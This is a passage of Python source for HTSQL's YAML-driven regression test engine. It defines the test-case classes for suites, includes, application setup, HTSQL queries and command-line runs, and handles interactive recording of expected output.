    Instances of :class:`TestData` are YAML-serializable. An instance of
    a :class:`TestData` subclass is represented as a mapping YAML node.
    The set of keys and the format of the values come from the `fields`
list. Add an :class:`AnyField` instance to `fields` to indicate
that the mapping node may contain some extra fields (which are to
be ignored).
The constructor of :class:`TestData` accepts the following arguments:
`routine` (:class:`RegressRoutine`)
The routine that started the testing.
`case_class` (a subclass of :class:`TestCase`)
A test type. The object being constructed is an instance
of either `case_class.Input` or `case_class.Output`.
`attributes` (a dictionary)
A dictionary of attributes and their values. The set of
attributes is declared using the `fields` class variable.
`location` (a string or ``None``)
When the test data is loaded from a YAML file, `location`
indicates the location of the corresponding YAML node.
"""
fields = []
def __init__(self, routine, case_class, attributes, location=None):
# Sanity check on the arguments.
assert isinstance(routine, RegressRoutine)
assert issubclass(case_class, TestCase)
assert self.__class__ in [case_class.Input, case_class.Output]
assert isinstance(attributes, dict)
assert isinstance(location, maybe(str))
self.routine = routine
self.case_class = case_class
for name in attributes:
setattr(self, name, attributes[name])
self.location = location
self.init_attributes()
def init_attributes(self):
"""
Normalize field values.
"""
# Override in a subclass if you need to massage some field values.
def __str__(self):
# Produces the value of the first mandatory field.
title_attribute = None
for field in self.fields:
if field.is_any:
continue
if field.is_mandatory:
title_attribute = field.attribute
if title_attribute is None:
return ''
return repr(getattr(self, title_attribute))
def __repr__(self):
return "<%s.%s %s>" % (self.case_class.__name__,
self.__class__.__name__, self)
class TestCase(object):
"""
Describes a test type.
    This is an abstract class. Create a subclass of :class:`TestCase`
to describe a new type of test case. When subclassing, define
the following class attributes:
`name` (a string)
The name of the test.
`hint` (a string)
Short one-line description of the test.
`help` (a string)
Long description of the test.
`Input` (a subclass of :class:`TestData`)
The format of the test input.
`Output` (a subclass of :class:`TestData` or ``None``)
The format of the test output.
You also need to override methods :meth:`verify` and :meth:`train`
to specify how to execute the test case in a normal and in a train mode.
The constructor of :class:`TestCase` takes the following arguments:
`routine` (:class:`RegressRoutine`)
The routine that started the testing.
`state`
An object keeping the mutable testing state.
`input` (an instance of `Input`)
Input test data.
`output` (an instance of `Output` or ``None``)
Expected output test data.
"""
name = None
hint = None
help = None
# Override to declare the format of input and output test data.
Input = None
Output = None
@classmethod
def get_hint(cls):
"""
Returns short one-line description of the test case.
"""
return cls.hint
@classmethod
def get_help(cls):
"""
Returns long description of the test case.
"""
# Produce:
# {help}
#
# Input data:
# {field.signature} - {field.hint}
# ...
#
# Output data:
# {field.signature} - {field.hint}
# ...
lines = []
help = trim_doc(cls.help)
if help is not None:
lines.append(help)
for data_class in [cls.Input, cls.Output]:
if data_class is None:
continue
if lines:
lines.append("")
lines.append("%s data:" % data_class.__name__)
for field in data_class.fields:
if field.is_any:
continue
signature = field.get_signature()
hint = field.get_hint()
if hint is not None:
lines.append(" %-24s : %s" % (signature, hint))
else:
lines.append(" %s" % signature)
return "\n".join(lines)
def __init__(self, routine, state, input, output):
# Sanity check on the arguments.
assert isinstance(routine, RegressRoutine)
assert isinstance(state, routine.state_class)
if self.Input is None:
assert input is None
else:
assert isinstance(input, self.Input)
if self.Output is None:
assert output is None
else:
assert isinstance(output, maybe(self.Output))
self.routine = routine
self.state = state
self.input = input
self.output = output
# When the test case is in the quiet mode (indicated by `is_quiet`),
# all output is redirected to `quiet_buffer`. If for some reason
# the test case leaves the quiet mode, all the accumulated data
# is dumped to the standard output stream.
self.is_quiet = routine.quiet
self.quiet_buffer = io.StringIO()
def make_output(self, **attributes):
# Generate a new test output record with the given attributes.
return self.Output(self.routine, self.__class__, attributes)
@classmethod
def matches(cls, input, output):
"""
Checks if the given input and output records belong to the same
test case.
Note that we assume that both test input and test output have
a field with the same attribute name. This attribute is called
the key attribute. Input data matches output data when the
values of their key attribute are equal.
"""
# Sanity check on the arguments.
assert isinstance(input, maybe(TestData))
assert isinstance(output, maybe(TestData))
# `input` and `output` must be instances of `Input` and `Output`
# classes of the test case.
if cls.Input is None or cls.Output is None:
return False
if not isinstance(input, cls.Input):
return False
if not isinstance(output, cls.Output):
return False
# Find the key attribute: one that is declared both as an input field
# and as an output field.
key_attribute = None
input_attributes = [field.attribute for field in cls.Input.fields
if not field.is_any]
output_attributes = [field.attribute for field in cls.Output.fields
if not field.is_any]
for attribute in input_attributes:
if attribute in output_attributes:
key_attribute = attribute
break
if key_attribute is None:
return False
# `input` and `output` are matched when the values of their key
# attributes are equal.
if getattr(input, key_attribute) != getattr(output, key_attribute):
return False
return True
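    # For example, `QueryTestCase.Input` and `QueryTestCase.Output`
    # (defined below) both declare a `uri` field, so for `query` tests
    # an input record matches an output record exactly when
    # `input.uri == output.uri`.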
def get_suites(self):
"""
For container test cases, returns a set of test suites that belong
to the test case; otherwise returns an empty set.
"""
return set()
def out(self, *values, **options):
"""
Print values to the standard output stream.
:meth:`out` supports the same options as
:meth:`htsql.ctl.script.Script.out` and an extra option:
`indent`
A number of spaces to print before the first value,
default is ``0``.
"""
indent = options.pop('indent', 0)
if indent:
values = (' '*(indent-1),) + values
# If the test case is in the quiet mode, redirect the output
# to `quiet_buffer`.
if self.is_quiet and 'file' not in options:
options['file'] = self.quiet_buffer
self.routine.ctl.out(*values, **options)
def ask(self, message, choices):
"""
Asks the user a question; returns the reply.
`message` (a string)
The question.
`choices` (a list of strings)
The list of valid replies.
Typically the question has the form::
Press ENTER to perform <the default action>,
'x'+ENTER to perform <another action>,
'y'+ENTER to perform <another action>,
'z'+ENTER to perform <another action>.
In this case, `choices` should be equal to::
['', 'x', 'y', 'z']
The reply is stripped of leading and trailing whitespaces
and translated to the lower case.
"""
# Leave the quiet mode and print the question.
self.force_out()
self.out()
self.out(">>>", message)
line = None
# Repeat till we get a valid answer.
while line not in choices:
self.out("> ", end='')
line = self.routine.ctl.stdin.readline().strip().lower()
return line
def ask_halt(self):
"""
Ask if the user wants to halt the tests.
Returns `DO_HALT` or `DO_CONTINUE`.
"""
line = self.ask("Press ENTER to halt,"
" 'c'+ENTER to continue", ['', 'c'])
if line == '':
return DO_HALT
if line == 'c':
return DO_CONTINUE
def ask_record(self):
"""
Ask if the user wants to remember the new output of a test case.
Returns `DO_RECORD`, `DO_SKIP`, or `DO_HALT`.
"""
line = self.ask("Press ENTER to record,"
" 's'+ENTER to skip,"
" 'h'+ENTER to halt", ['', 's', 'h'])
if line == '':
return DO_RECORD
if line == 's':
return DO_SKIP
if line == 'h':
return DO_HALT
def ask_save(self):
"""
Ask if the user wants to save the updated output data.
Returns `DO_SAVE` or `DO_DISCARD`.
"""
line = self.ask("Press ENTER to save changes,"
" 'd'+ENTER to discard changes", ['', 'd'])
if line == '':
return DO_SAVE
if line == 'd':
return DO_DISCARD
def out_exception(self, exc_info):
"""
Prints an exception traceback.
"""
# Obey the quiet mode: redirect to `quiet_buffer` if necessary.
if self.is_quiet:
file = self.quiet_buffer
else:
file = self.routine.ctl.stdout
exc_type, exc_value, exc_traceback = exc_info
traceback.print_exception(exc_type, exc_value, exc_traceback,
file=file)
def out_sep(self, sep="-", length=72):
"""
Prints a separator: a long line of dashes.
"""
self.out(sep*length)
def out_header(self):
"""
Prints a nice header describing the test case.
"""
# Print:
# ---------------- ... -
# {NAME} {value}
# ({input.location})
# where {value} is the value of the first field of the input data.
self.out_sep()
if not self.input.fields or self.input.fields[0].is_any:
return
attribute = self.input.fields[0].attribute
value = getattr(self.input, attribute)
if value is not None:
if isinstance(value, list):
value = " ".join(str(item) for item in value)
self.out("%s %s" % (self.name.upper(), value), indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def halted(self, message=None):
"""
Indicate that the test case failed and stop the tests.
"""
self.force_out()
if message is not None:
self.out(message)
self.state.failed += 1
self.state.is_exiting = True
def failed(self, message=None):
"""
Indicate that the test case failed; stop the tests unless
``--force`` or ``--train`` flags are set.
"""
self.force_out()
if message is not None:
self.out(message)
self.state.failed += 1
if not (self.routine.force or self.routine.train):
self.state.is_exiting = True
def updated(self, message=None):
"""
Indicate that the output of the test case has been updated.
"""
self.force_out()
if message is not None:
self.out(message)
self.state.updated += 1
def passed(self, message=None):
"""
Indicate that the test case passed.
"""
if message is not None:
self.out(message)
self.state.passed += 1
def force_out(self):
# Leave the quiet mode; flush the content of `quiet_buffer`
# to the standard output stream.
if not self.is_quiet:
return
self.is_quiet = False
buffer = self.quiet_buffer.getvalue()
self.routine.ctl.stdout.write(buffer)
self.routine.ctl.stdout.flush()
def verify(self):
"""
Executes the test case.
This method runs the test case with the given input data.
If the test completed without errors, compare the produced
output with the given expected output.
The test case fails if
- the test failed to complete without errors;
- or the expected test output is not provided;
- or the expected test output is not equal to the actual test output.
Some test cases may not generate output; in this case the test
passes if it is completed without errors.
"""
# Override when subclassing.
raise ScriptError("test %r is not implemented" % self.name)
def train(self):
"""
Executes the test case in the training mode; returns the output data.
In the train mode, when the expected test output is not equal to the
actual test output, the user is given a choice to update the expected
test output.
Note that when the output has not been changed or the user refused
to update it, the method must return the original output data,
``self.output``.
"""
# Override when subclassing if the test case requires test output data.
# Otherwise, just run the test case in the normal mode.
self.verify()
return None
class SkipTestCase(TestCase):
"""
Implements a skippable test case.
This is an abstract mixin class; subclasses should call :meth:`skipped`
to check if the test case is enabled or not.
"""
class Input(TestData):
fields = [
Field('skip', BoolVal(), False,
hint="""do not run the test"""),
Field('ifdef', SeqVal(StrVal()), None,
hint="""run only if a given toggle is active"""),
Field('ifndef', SeqVal(StrVal()), None,
hint="""run only if a given toggle is inactive"""),
]
def skipped(self):
"""
Checks if the test is disabled.
"""
# Verify if the test is unconditionally disabled.
if self.input.skip:
return True
# If a positive guard is set, check that at least one of the required
# toggles is active.
if self.input.ifdef is not None:
if not (self.state.toggles & set(self.input.ifdef)):
return True
# If a negative guard is set, check that none of the suppressed
# toggles is active.
if self.input.ifndef is not None:
if self.state.toggles & set(self.input.ifndef):
return True
# The test is not skipped.
return False
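# In YAML test input, these guards look like (the toggle name and the
# queries are hypothetical):
#
#     - uri: /school
#       ifdef: [with-schools]
#     - uri: /legacy
#       skip: true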
class DefineTestCase(SkipTestCase):
"""
Activates a named toggle.
"""
name = "define"
hint = """activate a toggle"""
help = """
This test case activates a toggle variable. A toggle allows one
to conditionally enable or disable some test cases using `ifdef`
and `ifndef` directives.
"""
class Input(TestData):
fields = [
Field('define', SeqVal(StrVal()),
hint="""activate the given toggles"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Activates the toggles.
for toggle in self.input.define:
self.state.toggles.add(toggle)
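# In YAML, toggles are activated with, e.g. (hypothetical names):
#
#     - define: [with-schools, with-demo-data]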
class RunAndCompareTestCase(SkipTestCase):
"""
Implements common methods for a broad category of test cases.
This class implements common scenario: run the test, get the output
and compare it with the expected output.
This is an abstract class; create a subclass to implement a concrete
    test case. The following methods have to be overridden: :meth:`execute`,
:meth:`render` and :meth:`differs`.
"""
def out_lines(self, lines, indent=0):
"""
        Prints the lines with the specified indentation.
"""
        for line in lines:
            # Byte strings are decoded as UTF-8; when a line is not
            # valid UTF-8, control and non-ASCII characters are
            # replaced with dots.
            if isinstance(line, bytes):
                try:
                    line = line.decode('utf-8')
                except UnicodeDecodeError:
                    line = re.sub(r'[\x00-\x1F\x7F-\xFF]', '.',
                                  line.decode('latin1'))
            self.out(line.rstrip(), indent=indent)
def out_diff(self, old_output, new_output):
"""
Prints the delta between two test outputs.
"""
# Sanity check on the arguments.
assert isinstance(old_output, maybe(self.Output))
assert isinstance(new_output, self.Output)
# Render the outputs to the lists of lines.
old_lines = self.render(old_output)
new_lines = self.render(new_output)
# This function is supposed to be called in two cases:
# when there is no expected output, but only the actual output,
# and when the expected output differs from the actual output.
# However it may also happen that the function is called with
# two identical outputs, or that the `render` method hides
# the difference.
if old_lines is None:
self.out("=== the test output is new")
elif old_lines != new_lines:
self.out("=== the test output is changed")
else:
self.out("=== the test output is not changed")
self.out()
# Display the actual output if there is no expected output;
# otherwise display the delta between the expected and the actual
# output in the unified diff format.
if old_lines is None or old_lines == new_lines:
lines = new_lines
else:
diff = difflib.unified_diff(old_lines, new_lines,
n=2, lineterm='')
# Strip the leading `---` and `+++` lines of the unified diff.
lines = list(diff)[2:]
self.out_lines(lines, indent=2)
def render(self, output):
"""
Converts the output data to a list of lines.
"""
# Override when subclassing.
raise NotImplementedError()
def execute(self):
"""
Runs the test case; returns the produced output.
        Returns ``None`` if an error occurred when running the test case.
"""
# Override when subclassing.
raise NotImplementedError()
def differs(self, old_output, new_output):
"""
Checks if the actual test output differs from the expected test output.
"""
# Override when subclassing.
raise NotImplementedError()
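    # A minimal subclass sketch (a hypothetical test kind, assuming its
    # input and output records share an `echo` key field):
    #
    #     class EchoTestCase(RunAndCompareTestCase):
    #         def execute(self):
    #             return self.make_output(echo=self.input.echo)
    #         def render(self, output):
    #             if output is None:
    #                 return None
    #             return output.echo.splitlines()
    #         def differs(self, old_output, new_output):
    #             if old_output is None or new_output is None:
    #                 return True
    #             return old_output.echo != new_output.echo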
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# When no expected test output, fail without executing the test.
if self.output is None:
return self.failed("*** no output data found")
# Execute the test; get the actual test output.
new_output = self.execute()
# `None` indicates that an error occurred; `execute()` is responsible
# for displaying an error message, so we just update the status and
# exit.
if new_output is None:
return self.failed()
# Compare the expected and the actual outputs, fail if they are
# different.
if self.differs(self.output, new_output):
self.out_diff(self.output, new_output)
return self.failed("*** unexpected test output")
# The actual output coincides with the expected output; we are good.
return self.passed()
def train(self):
# Check if the test is skipped.
if self.skipped():
return self.output
# Display the header.
self.out_header()
# Execute the test; get the actual test output.
new_output = self.execute()
# We need to handle three possible outcomes: an error occurred
# when running the test, the expected output differs from the
# actual output and the expected output coincides with the actual
# output.
# An error occurred while running the test.
if new_output is None:
# Ask the user if they want to stop the testing; the expected
# output is not updated.
reply = self.ask_halt()
if reply is DO_HALT:
self.halted("*** halting")
else:
self.failed()
return self.output
# The actual output differs from the expected output.
if self.differs(self.output, new_output):
# Display the difference.
self.out_diff(self.output, new_output)
# Ask the user if they want to record the new output,
# keep the old output, or halt the testing.
reply = self.ask_record()
if reply is DO_HALT:
self.halted("*** halting")
return self.output
if reply is DO_RECORD:
if self.output is None:
self.updated("*** recording new test output")
else:
self.updated("*** recording updated test output")
return new_output
self.failed()
return self.output
# The actual output coincides with the expected output; note that
# the caller checks if ``case.train() is case.output`` to learn
# if the output is updated.
self.passed()
return self.output
class AppTestCase(SkipTestCase):
"""
Configures the HTSQL application.
"""
name = "app"
hint = """configure the HTSQL application"""
help = """
To run HTSQL requests, the testing engine needs to create an HTSQL
application. This test case allows you to configure the application
parameters.
"""
class Input(TestData):
fields = [
Field('db', DBVal(is_nullable=True),
hint="""the connection URI"""),
Field('extensions', MapVal(StrVal(),
MapVal(StrVal(), AnyVal())),
default={},
hint="""include extra extensions"""),
Field('save', StrVal(), default=None,
hint="""name of the configuration""")
] + SkipTestCase.Input.fields
def out_header(self):
# Overriden to avoid printing the password to the database.
# Clone `input.db`, but omit the password.
db = self.input.db
if db is not None:
sanitized_db = DB(engine=db.engine,
username=db.username,
password=None,
host=db.host,
port=db.port,
database=db.database,
options=db.options)
else:
sanitized_db = "-"
# Print:
# ---------------- ... -
# APP {sanitized_db}
# ({input.location})
self.out_sep()
self.out("%s %s" % (self.name.upper(), sanitized_db), indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Create an application and update the testing state. The created
# application will be in effect for the subsequent tests in the
# current suite and all the nested suites unless overridden.
from htsql import HTSQL
self.state.app = None
try:
self.state.app = HTSQL(self.input.db,
self.input.extensions)
except Exception:
self.out_exception(sys.exc_info())
            return self.failed("*** an exception occurred while"
                               " initializing an HTSQL application")
# Record the configuration.
if self.input.save is not None:
self.state.saves[self.input.save] = (self.input.db,
self.input.extensions)
return self.passed()
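# In YAML, an `app` test case looks like (the connection URI and the
# extension are illustrative):
#
#     - db: sqlite:///htsql_demo.sqlite
#       extensions:
#         tweak.autolimit: {limit: 10000}
#       save: demo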
class LoadAppTestCase(SkipTestCase):
"""
Loads an existing configuration of an HTSQL application.
"""
name = "load-app"
hint = """activate an existing HTSQL application"""
help = """
This test case loads a previously saved application configuration.
"""
class Input(TestData):
fields = [
Field('load', StrVal(),
hint="""name of the configuration"""),
Field('extensions', MapVal(StrVal(),
MapVal(StrVal(), AnyVal())),
default={},
hint="""include extra extensions"""),
Field('save', StrVal(), default=None,
hint="""name of the new configuration""")
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Find the configuration data; complain if not found.
if self.input.load not in self.state.saves:
return self.failed("*** unknown configuration name %s"
% self.input.load)
configuration = self.state.saves[self.input.load]
# Add new extensions.
configuration = configuration+(self.input.extensions,)
# Create an application and update the testing state.
from htsql import HTSQL
self.state.app = None
try:
self.state.app = HTSQL(*configuration)
except Exception:
self.out_exception(sys.exc_info())
            return self.failed("*** an exception occurred while"
                               " initializing an HTSQL application")
# Record the new configuration.
if self.input.save is not None:
self.state.saves[self.input.save] = configuration
return self.passed()
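# A configuration saved by an `app` test case is reused with, e.g.
# (the name is illustrative):
#
#     - load: demo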
class IncludeTestCase(SkipTestCase):
"""
Loads input test data from a file.
"""
name = "include"
hint = """load input data from a file"""
help = """
This test case allows you to execute a test case or a test suite defined
in a separate file.
"""
class Input(TestData):
fields = [
Field('include', StrVal(),
hint="""file containing input test data"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('include', StrVal(),
hint="""file containing input test data"""),
Field('output', ClassVal(TestData),
hint="""the corresponding output test data"""),
]
def __init__(self, routine, state, input, output):
super(IncludeTestCase, self).__init__(routine, state, input, output)
# Load the input data and create the corresponding test case.
self.included_input = routine.load_input(self.input.include)
case_class = self.included_input.case_class
self.included_output = None
if self.output is not None:
if case_class.matches(self.included_input, self.output.output):
self.included_output = self.output.output
self.case = case_class(routine, state,
self.included_input,
self.included_output)
def get_suites(self):
# Get the set of nested suites.
return self.case.get_suites()
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Run the included test.
self.case.verify()
def train(self):
# Check if the test is skipped.
if self.skipped():
return self.output
# Run the included test; get the output.
new_output = self.case.train()
# Three outcomes are possible: the test generated no output, in this
# case we don't need to create an output record either; the test
# generated new or updated output, we have to update our output as
# well; and finally, the test output didn't change, we could keep
# ours too.
if new_output is None:
output = None
elif new_output is not self.included_output:
output = self.make_output(include=self.input.include,
output=new_output)
else:
output = self.output
return output
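# In YAML, an include looks like (the path is hypothetical):
#
#     - include: test/input/schema.yaml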
class SuiteTestCase(SkipTestCase):
"""
Implements a container of test cases.
"""
name = "suite"
hint = """contains other test cases"""
help = """
A test suite is a container of test cases. Typically, it is the
top-level test case in a test file.
The testing engine allows you to specify what suites to run by their
ids.
"""
class Input(TestData):
fields = [
Field('title', StrVal(),
hint="""the description of the suite"""),
Field('id', StrVal(), None,
hint="""the code name of the suite"""),
Field('output', StrVal(), None,
hint="""file to save the output of the tests"""),
Field('tests', SeqVal(ClassVal(TestData)),
hint="""a list of test inputs"""),
] + SkipTestCase.Input.fields
def init_attributes(self):
# When `id` is not specified, generate it from the title.
if self.id is None:
self.id = self.title.lower().replace(' ', '-')
class Output(TestData):
fields = [
Field('id', StrVal(),
hint="""the code name of the suite"""),
Field('tests', SeqVal(ClassVal(TestData)),
hint="""a list of test outputs"""),
]
def __init__(self, routine, state, input, output):
super(SuiteTestCase, self).__init__(routine, state, input, output)
# A test suite has an ability to save its test output to a separate
# file. In this case, `self.ext_output` contains the test data
# loaded from the file.
self.ext_output = None
if input.output is not None and os.path.exists(input.output):
ext_output = routine.load_output(input.output)
if self.matches(input, ext_output):
self.ext_output = ext_output
# Generate a list of test cases.
self.cases = []
self.cases_state = TestState()
self.init_cases()
def init_cases(self):
# Generate a list of test cases. We have two independent lists:
# one containing input test records and the other containing
# output test records. Our goal is to find matching pairs and
# generate the corresponding test cases.
# The matching pairs of input and output data.
pairs = []
# List of available output records. We need to copy it since
# it is going to be modified.
available_outputs = []
if self.ext_output is not None:
available_outputs = self.ext_output.tests[:]
elif self.output is not None:
available_outputs = self.output.tests[:]
# For each input record, find the matching output record.
for input in self.input.tests:
case_class = input.case_class
for idx, output in enumerate(available_outputs):
if case_class.matches(input, output):
pairs.append((input, output))
del available_outputs[idx]
break
else:
pairs.append((input, None))
# Initialize the test cases.
for input, output in pairs:
case_class = input.case_class
case = case_class(self.routine, self.cases_state, input, output)
self.cases.append(case)
def get_suites(self):
# Get a set of (this and) the nested suites.
suites = set([self.input.id])
for case in self.cases:
suites |= case.get_suites()
return suites
def out_header(self):
# Print the header:
# ================ ... =
# {input.title}
# ({input.location})
self.out_sep("=")
self.out(self.input.title, indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def skipped(self):
# Check if the suite should not be executed.
# Check if the test case was explicitly disabled.
if super(SuiteTestCase, self).skipped():
return True
# The suite is skipped when:
# - the user specified an explicit list of the suites to run;
# - and the suite is not one of them;
# - and the suite does not contain any selected nested suite;
# - and the suite is not nested in some selected suite.
if not self.routine.suites:
return False
if self.state.with_all_suites:
return False
if self.input.id in self.routine.suites:
self.cases_state.with_all_suites = True
return False
if self.get_suites() & set(self.routine.suites):
return False
return True
def verify(self):
# Run the suite.
# Push the current state to the cases state.
self.state.push(self.cases_state)
# Check if the suite is disabled or if the user specified
# the suites to run and this one is not among them.
if self.skipped():
return
# Display the headers.
self.out_header()
# Run the nested test cases.
for case in self.cases:
case.verify()
# Check if the user asked to halt the testing.
if self.cases_state.is_exiting:
break
# Pull the statistical information from the cases state.
self.state.pull(self.cases_state)
def train(self):
# Run the suite; update the test output if necessary.
# Push the current state to the cases state.
self.state.push(self.cases_state)
# Check if the suite is disabled or if the user specified
# the suites to run and this one is not among them.
if self.skipped():
return self.output
# A dictionary containing the output (or `None`) generated by test
# cases when it differs from the existing test output.
new_output_by_case = {}
# Display the header.
self.out_header()
# Run the nested tests.
for case in self.cases:
new_output = case.train()
# Record modified output data.
if new_output is not case.output:
new_output_by_case[case] = new_output
# Check if the user asked to halt the testing.
if self.cases_state.is_exiting:
break
# Pull the statistical information from the cases state.
self.state.pull(self.cases_state)
# Generate a new output record.
output = self.make_output(new_output_by_case)
# The output is kept in a separate file.
if self.input.output is not None:
# If the output has been updated, ask the user if they want
# to save it.
if output is not self.ext_output:
self.out_sep()
reply = self.ask_save()
if reply is DO_DISCARD:
# `self.output` may still be not ``None`` if the `output`
# field was recently added. In that case, we don't want
# to delete the regular output data until it is saved
# to a separate file.
return self.output
self.out("*** saving test output data to %r"
% self.input.output)
self.routine.save_output(self.input.output, output)
# Returning `None` since the output is saved to a separate file.
return None
return output
def make_output(self, new_output_by_case):
# Generate the output test data.
# Here we update the list of output test records. Note that the list
# may contain some inactive output records. These output records
# do not correspond to any input records and thus have no respective
# test case. It may happen if the user removed or modified the input
# data. Since a test case may be only temporarily disabled, we never
# remove inactive output records unless the `--purge` option is enabled.
# The list of the output records.
tests = []
# Start with the original list of output records.
if self.output is not None:
tests = self.output.tests[:]
if self.ext_output is not None:
tests = self.ext_output.tests[:]
# `--purge` is enabled, we don't have to keep inactive records,
# so simply generate the list from scratch.
if self.routine.purge and not self.state.is_exiting:
tests = []
for case in self.cases:
output = case.output
if case in new_output_by_case:
output = new_output_by_case[case]
if output is not None:
tests.append(output)
# Some test cases generated new output, so we need to update the list.
elif new_output_by_case:
# Here we take the original list of records and replace those
# that have been updated. We may also encounter a new output
# record, which has no corresponding old record in the list.
# For that new record, we need to find a position in the list.
# We want the order of the output records to match the order
# of their respective input records, so to ensure this, we
# put any new record immediately after all other records processed
# so far.
# Position to put new records.
next_idx = 0
for case in self.cases:
# The record has been added, removed or updated.
if case in new_output_by_case:
new_output = new_output_by_case[case]
# The record is rarely entirely removed so we should almost
# never get ``None`` here. If we do, do nothing.
if new_output is not None:
# This is an updated record: replace the old record
# and update the position for the following new
# records.
if case.output in tests:
idx = tests.index(case.output)
tests[idx] = new_output
if idx >= next_idx:
next_idx = idx+1
# This is a new record: place it to the designated
# position.
else:
tests.insert(next_idx, new_output)
next_idx += 1
# The record has not been changed.
else:
# Make sure any new record will go after this one.
if case.output in tests:
idx = tests.index(case.output)
if idx >= next_idx:
next_idx = idx+1
# When there are no test output data, skip creating the output record.
if not tests:
return None
# Now we need to check if the new output list coincides with the old
# one, in which case we don't want to create a new output record.
if self.input.output is not None:
if self.ext_output is not None and self.ext_output.tests == tests:
return self.ext_output
else:
if self.output is not None and self.output.tests == tests:
return self.output
# Generate and return new output data.
output = super(SuiteTestCase, self).make_output(id=self.input.id,
tests=tests)
return output
class QueryTestCase(RunAndCompareTestCase):
"""
Performs an HTSQL query.
"""
name = "query"
hint = """execute an HTSQL query"""
help = """
This test case executes an HTSQL query.
"""
class Input(TestData):
fields = [
Field('uri', StrVal(),
hint="""the HTSQL query"""),
Field('method', ChoiceVal(['GET', 'POST']), 'GET',
hint="""the HTTP method (GET or POST)"""),
Field('remote_user', StrVal(), None,
hint="""the HTTP remote user"""),
Field('headers', MapVal(StrVal(), StrVal()), None,
hint="""the HTTP headers"""),
Field('content_type', StrVal(), None,
hint="""the content type of HTTP POST data"""),
Field('content_body', StrVal(), None,
hint="""the HTTP POST data"""),
Field('expect', IntVal(), 200,
hint="""the HTTP status code to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the response body"""),
Field('ignore_headers', BoolVal(), False,
hint="""ignore the response headers"""),
] + SkipTestCase.Input.fields
def init_attributes(self):
# Check that `content-type` and `content-body` are set only if
# the HTTP method is `POST`.
if self.method == 'GET':
if self.content_type is not None:
raise ValueError("unexpected content-type parameter"
" for a GET request")
if self.content_body is not None:
raise ValueError("unexpected content-body parameter"
" for a GET request")
if self.method == 'POST':
if self.content_body is None:
raise ValueError("no expected content-body parameter"
" for a POST request")
class Output(TestData):
fields = [
Field('uri', StrVal(),
hint="""the HTSQL query"""),
Field('status', StrVal(),
hint="""the response status line"""),
Field('headers', SeqVal(SeqVal(StrVal(), length=2)),
hint="""the response headers"""),
Field('body', StrVal(),
hint="""the response body"""),
]
def init_attributes(self):
# Convert the list of two-element lists to a list of pairs.
self.headers = [(key, value) for key, value in self.headers]
def out_header(self):
# Display the header:
# ---------------- ... -
# {method} {uri}
# ({input.location})
# Remote-User: {remote_user}
# {header}: value
# ...
# Content-Type: {content_type}
#
# {content_body}
self.out_sep()
self.out("%s %s" % (self.input.method, self.input.uri), indent=2)
self.out("(%s)" % self.input.location, indent=2)
if self.input.remote_user is not None:
self.out("Remote-User: %s" % self.input.remote_user, indent=2)
if self.input.headers:
for key in sorted(self.input.headers):
value = self.input.headers[key]
self.out("%s: %s" % (key, value), indent=2)
if self.input.content_type is not None:
self.out("Content-Type: %s" % self.input.content_type, indent=2)
self.out()
if self.input.content_body:
self.out_lines(self.input.content_body.splitlines(), indent=2)
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if old_output.status != new_output.status:
return True
if not self.input.ignore_headers:
if old_output.headers != new_output.headers:
return True
if not self.input.ignore:
if old_output.body != new_output.body:
return True
return False
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
lines = []
lines.append(output.status)
for header, value in output.headers:
lines.append("%s: %s" % (header, value))
lines.append("")
lines.extend(output.body.splitlines())
return lines
def execute(self):
# Execute the query; return the output.
# Prepare the HTSQL application.
app = self.state.app
if app is None:
return self.failed("*** no HTSQL application is defined")
# Prepare and execute the query.
request = Request.prepare(method=self.input.method,
query=self.input.uri,
remote_user=self.input.remote_user,
content_type=self.input.content_type,
content_body=self.input.content_body,
extra_headers=self.input.headers)
response = request.execute(app)
# Check if the response is valid.
if response.exc_info is not None:
self.out_exception(response.exc_info)
return self.out("*** an exception occured"
" while executing the query")
if not response.complete():
return self.out("*** the response is not complete")
# Generate the output record.
new_output = self.make_output(uri=self.input.uri,
status=response.status,
headers=response.headers,
body=response.body)
# Check if we get the expected status code (200, by default).
# If not, display the response and discard the output.
if not response.status.startswith(str(self.input.expect)):
self.out_diff(self.output, new_output)
return self.out("*** unexpected status code: %s"
% response.status)
return new_output
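# A typical `query` test in YAML (the query itself is illustrative; the
# `expect` field defaults to 200 and is shown here only for clarity):
#
#     - uri: /school{code,name}
#       expect: 200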
class CtlTestCase(RunAndCompareTestCase):
"""
Executes a script routine.
"""
name = "ctl"
hint = """execute a routine"""
help = """
This test case simulates a run of the HTSQL command-line application.
"""
class Input(TestData):
fields = [
Field('ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard input"""),
Field('expect', IntVal(), 0,
hint="""the exit code to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the exit code and the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdout', StrVal(),
hint="""the content of the standard output"""),
Field('exit', IntVal(),
hint="""the exit code"""),
]
def out_header(self):
# Display the header:
# ---------------- ... -
# {EXECUTABLE} {ctl}
# ({input.location})
self.out_sep()
executable = os.path.basename(self.routine.executable)
command_line = " ".join([executable.upper()]+self.input.ctl)
self.out(command_line, indent=2)
self.out("(%s)" % self.input.location, indent=2)
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if not self.input.ignore:
if old_output.exit != new_output.exit:
return True
if old_output.stdout != new_output.stdout:
return True
return False
def render(self, output):
# Convert the output to a list of lines.
if output is None:
return None
return output.stdout.splitlines()
def execute(self):
# Run the routine; return the output
# Prepare the standard streams and the script instance.
stdout = io.StringIO()
